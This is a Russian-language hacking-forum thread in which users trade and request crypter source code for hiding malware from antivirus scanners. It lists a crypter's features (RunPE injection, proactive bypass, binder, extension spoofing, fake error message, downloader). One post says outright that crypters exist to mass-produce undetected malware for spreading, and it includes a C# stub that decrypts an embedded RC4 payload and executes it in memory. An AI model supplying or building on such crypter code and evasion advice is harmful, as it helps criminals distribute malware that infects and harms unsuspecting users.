- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Ну я то пытался чистить уже скомпилированный проект.Экзешник.Для общего развития.
А то что легче добавлять мусор в код-это да.
Подборка исходников крипторов
- Автор темы X-Shar
- Дата начала
А то что легче добавлять мусор в код-это да.
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Исходник криптора (как я понял на нынешнем vb),вроде неплохого если судить по функционалу:
Features:
Runtime/Scantime
RunPE Injection
Proactive Bypass
USG 0.1% similarities
Binder
Assembly Info Generator/Cloner
Extension Spoofer
Delay
Startup
Fake Error Message
Downloader
Works with .Net Malware and Native 32/64
NetSeal 2 Ready
Does Not include a scanner.
+ More classified undocumented features
Features:
Runtime/Scantime
RunPE Injection
Proactive Bypass
USG 0.1% similarities
Binder
Assembly Info Generator/Cloner
Extension Spoofer
Delay
Startup
Fake Error Message
Downloader
Works with .Net Malware and Native 32/64
NetSeal 2 Ready
Does Not include a scanner.
+ More classified undocumented features
I
Irbis
Гость
Приветствую всех спецов по крипту! %)
Есть у кого-нибудь сорцы Pohernah, Morphnah, RPolyCrypt (by Vaska) ?
Пригодились бы для изучения...
Есть у кого-нибудь сорцы Pohernah, Morphnah, RPolyCrypt (by Vaska) ?
Пригодились бы для изучения...
- Регистрация
- 03.06.2012
- Сообщения
- 6 082
- Репутация
Это какие-то совсем старые, ссылки все удалены, хоть упоминания в поисковиках есть...
Попробовал поискать, но не исключено, что и не найти теперь-уже, если только действительно у кого-то валяется, но думаю навряд-ли уже удастся найти !
O
obbana
Гость
народ, а есть тут исходники криптера, не палящегося в оперативке?
- Регистрация
- 03.06.2012
- Сообщения
- 6 082
- Репутация
Вот глянь:https://ru-sfera.pw/threads/isxodniki-kriptora-na-s.709/ и от Pastorok нормальный + от Джафара тоже не плохой...
D
DustyC
Гость
Криптор криптором, а каким образом избежать поведенчнского анализа?
Статика неинтересно, и даже однократная остановка эмулятора.
Самая главная часть это когда исполняется полезная нагрузка.
Все остальное мне кажется баловство.
Статика неинтересно, и даже однократная остановка эмулятора.
Самая главная часть это когда исполняется полезная нагрузка.
Все остальное мне кажется баловство.
- Регистрация
- 03.06.2012
- Сообщения
- 6 082
- Репутация
Это-уже дело самого вируса...
Криптор нужен для обхода сканеров, а обход "Поведенческого детекта" уже дело как-раз нагрузки, ненадо этого путать...
Вот пример, я создал вирус который каким-то образом обходит файервол и начил его распространять, через какое-то время АВ его добавил в базы, НО большая вероятность, что криптованный вирус следующего поколения также будет обходить файервол, но сканер его уже не будет видить...
Если криптор хороший, то можно наделать кучу экземпляров вирусов для паблика, при минимальных усилий...
ИТОГ: Криптор в моём понимании нужен для облегчения распространять зловредов, НО он не должен обходить файерволы, поведенческие детекты и т.д., это дело уже самого вируса...
А вообще кто-нить здесь на форуме каких-то успехов добился в этом деле ?
Я чот-так и не стал "Мастером кунг-фу" крипторов, так пару-раз пробовал писать, потом надоело и тупо забил !
Знаю, что многие вполне успешно пишут на С#, в нём не разу не кодил, но там гораздо легче, вот к примеру даже функция запуска в памяти, или на Делфи партянка:https://ru-sfera.pw/threads/poleznye-procedury-i-funkcii-dlja-delfi.1930/#post-97426
Или на С#:
Код:
static void Main() {
byte[] betyFile = RC4EncryptDecrypt(Convert.FromBase64String("$FILE$"), "RC4KEY");
System.Reflection.Assembly.Load(betyFile).EntryPoint.Invoke(null, null);
}Рекомендую почитать:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
D
dimakim95
Гость
Спасибо огромное)